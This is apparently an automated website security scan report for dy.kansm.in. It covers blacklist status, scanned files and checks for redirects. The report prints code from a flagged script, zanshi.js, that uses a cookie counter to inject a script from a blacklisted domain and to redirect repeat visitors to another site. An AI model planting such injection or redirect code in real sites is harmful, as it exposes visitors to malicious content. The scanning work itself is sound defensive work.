Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dy.kansm.in
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dy.kansm.in/ | 200 OK Content-Length: 26191 Content-Type: text/html | clean |
http://dy.kansm.in/Public/ads/top46860.js | 200 OK Content-Length: 27 Content-Type: application/x-javascript | clean |
http://dy.kansm.in/top.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://dy.kansm.in/head1.js | 200 OK Content-Length: 84 Content-Type: application/x-javascript | clean |
http://dy.kansm.in/Public/ads/top960.js | 200 OK Content-Length: 25 Content-Type: application/x-javascript | clean |
http://js.users.51.la/57584.js | 200 OK Content-Length: 1941 Content-Type: application/x-javascript | clean |
http://dy.kansm.in/zanshi/zanshi.js | 200 OK Content-Length: 1627 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: 1.933m.com ...[1072 bytes skipped]... br/> var expdate=new Date(); var kansm1; expdate.setTime(expdate.getTime()+(24*60*60*1000*365)); //ÉèÖÃCOOKIESʱ¼äΪ1Äê,×Ô¼ºËæ±ãÉèÖøÃʱ¼ä if(!(kansm1=GetCookie("kansm1")))kansm1=0;kansm1++;SetCookie("kansm1",kansm1,expdate,"/",null,false); //ÒÔÏÂÐÅÏ¢ÏÔʾ¿ÉÒÔʹÓñê×¼µÄHTMLÓï·¨,×Ô¼ºËæ±ãÉèÖà if(kansm1==1)//À´·Ã2´ÎµÄÐÅÏ¢ÏÔʾ£¬ÒÔÏÂÀàÍÆ£¬×Ô¼ºËæ±ãÔö¼Ó document.writeln("<script src=\"http:\/\/1.933m.com\/1.js\"><\/script>"); if(kansm1>=2) { document.write("<script language=\"javascript\" type=\"text\/javascript\">window.location.href=\"http:\/\/huaididi.org\/huaididi\/23-2.html?dykansm\"; <\/script>") kansm1 = 0; } SetCookie("kansm1",kansm1,expdate,"/",null,false); | ||
http://dy.kansm.in/?s=vod-show-id-2.html | 200 OK Content-Length: 23630 Content-Type: text/html | clean |
http://dy.kansm.in/?s=vod-show-id-1.html | 200 OK Content-Length: 30354 Content-Type: text/html | clean |
http://dy.kansm.in/?s=vod-show-id-3.html | 200 OK Content-Length: 19286 Content-Type: text/html | clean |
http://dy.kansm.in/Public/js/home.js | 200 OK Content-Length: 227 Content-Type: application/x-javascript | clean |
http://dy.kansm.in/Public/ads/left250250.js | 200 OK Content-Length: 29 Content-Type: application/x-javascript | clean |
http://dy.kansm.in/?s=vod-show-id-4.html | 200 OK Content-Length: 18153 Content-Type: text/html | clean |
http://dy.kansm.in/?s=vod-show-id-5.html | 200 OK Content-Length: 19205 Content-Type: text/html | clean |
http://dy.kansm.in/?s=vod-show-id-6.html | 200 OK Content-Length: 7057 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dy.kansm.in
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 10 Jan 2015 20:23:31 GMT
Pragma: no-cache
Server: nginx/1.0.15
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=af8552c881c57bfeb738c7596e4d0db7; path=/
Set-Cookie: think_template=s%3A7%3A%22default%22%3B; expires=Sat, 10-Jan-2015 21:23:31 GMT; path=/
X-Powered-By: PHP/5.2.17p1
GET / HTTP/1.1
Host: dy.kansm.in
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 10 Jan 2015 20:23:31 GMT
Pragma: no-cache
Server: nginx/1.0.15
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=af8552c881c57bfeb738c7596e4d0db7; path=/
Set-Cookie: think_template=s%3A7%3A%22default%22%3B; expires=Sat, 10-Jan-2015 21:23:31 GMT; path=/
X-Powered-By: PHP/5.2.17p1
Second query (visit from search engine):
GET / HTTP/1.1
Host: dy.kansm.in
Referer: http://www.google.com/search?q=dy.kansm.in
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dy.kansm.in
Referer: http://www.google.com/search?q=dy.kansm.in
Result:
The result is similar to the first query. There are no suspicious redirects found.